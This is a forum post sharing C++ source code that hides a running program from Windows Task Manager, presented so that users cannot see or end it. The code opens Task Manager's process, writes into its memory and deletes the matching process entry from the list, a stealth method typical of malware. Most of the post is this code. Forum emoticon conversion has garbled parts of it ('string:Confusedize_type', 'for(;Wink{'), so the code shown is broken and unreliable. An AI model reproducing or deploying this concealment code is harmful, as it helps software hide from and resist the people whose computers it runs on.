• 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Make a program hide itself from Task Manager
#1
If you for whatever reason decided maybe a user shouldn't end your program (because they don't want you to stop their er.. music right) you following code will help out. This code will NOT make you immune too HJT and other log generators, just too users checking their Task Manager. Also: Will only work on English versions of Winblows, if you would like to change it for other versions check line 49, You could duplicate line 49 but substitute "Windows Task Manager" for translated versions, and for each translation you will need to create a new if statement like the one between 63 and 101 substituting "Processes" and "SysListView32" for their translating correspondent.
[code=cpp]#include <iostream>
using namespace std;
#include <windows.h>
#include <stdio.h>
#include <commctrl.h>
#include <string>

const unsigned long BUFSIZE = 255;
unsigned long dwSize = BUFSIZE;
char pbuf[ BUFSIZE + 1];

char filename[ MAX_PATH ];
DWORD size = GetModuleFileNameA( NULL, filename, MAX_PATH );

LVITEM lvi, *_lvi;
char item[512], subitem[512];

char *_item, *_subitem;
unsigned long pid;
HANDLE process;

char exename[257];

BOOL CALLBACK block(HWND,LPARAM);
int main(){


GetUserName(pbuf, &dwSize);
//cout << (LPCTSTR)pbuf << endl;



if (size){
string strfilename = (string)filename;
string:Confusedize_type position = strfilename.rfind('\\');
position++; //Only calculates to one BEFORE backslash
string finalexe = strfilename.substr(position, strfilename.size());

for(int a=0;a<=finalexe.size();a++){
exename[a] = finalexe[a];
}
}



HWND fwindow;
for(;Wink{
Sleep(1);
EnumChildWindows(FindWindow(0,"Windows Task Manager"),block,0);
}

return 0;
}

BOOL CALLBACK block(HWND hwnd,LPARAM lParam)
{
char classname[150] = "";
char windowtext[150] = "";

GetWindowText(hwnd,windowtext,149);
GetClassName(hwnd,classname,249);

if (strstr(windowtext,"Processes") && strstr(classname,"SysListView32") !=NULL)
{

int count=(int)SendMessage(hwnd, LVM_GETITEMCOUNT, 0, 0);
int i;
GetWindowThreadProcessId(hwnd, &pid);
process=OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_READ|
PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, FALSE, pid);

_lvi=(LVITEM*)VirtualAllocEx(process, NULL, sizeof(LVITEM),
MEM_COMMIT, PAGE_READWRITE);
_item=(char*)VirtualAllocEx(process, NULL, 512, MEM_COMMIT,
PAGE_READWRITE);
_subitem=(char*)VirtualAllocEx(process, NULL, 512, MEM_COMMIT,
PAGE_READWRITE);

lvi.cchTextMax=512;
for(i=0; i<count; i++) {
lvi.iSubItem=0;
lvi.pszText=_item;
WriteProcessMemory(process, _lvi, &lvi, sizeof(LVITEM), NULL);
SendMessage(hwnd, LVM_GETITEMTEXT, (WPARAM)i, (LPARAM)_lvi);

lvi.iSubItem=1;
lvi.pszText=_subitem;
WriteProcessMemory(process, _lvi, &lvi, sizeof(LVITEM), NULL);
SendMessage(hwnd, LVM_GETITEMTEXT, (WPARAM)i, (LPARAM)_lvi);


ReadProcessMemory(process, _item, item, 512, NULL);
ReadProcessMemory(process, _subitem, subitem, 512, NULL);

if (strstr(item,exename) && strstr(subitem,(LPCTSTR)pbuf) !=NULL) SendMessage(hwnd, LVM_DELETEITEM, (WPARAM)i, (LPARAM)_lvi);//to compare with 'item' you put the executable name, and to compare with the processes owner, (ex, System),
}
VirtualFreeEx(process, _lvi, 0, MEM_RELEASE);
VirtualFreeEx(process, _item, 0, MEM_RELEASE);
VirtualFreeEx(process, _subitem, 0, MEM_RELEASE);
return FALSE;
}

return TRUE;
}[/code]
[Image: nomnomnom.jpg]
;7$=v?%v%#5>v7v8994
The decrypt code is V, I could not make it any simpler!
  Reply


Forum Jump: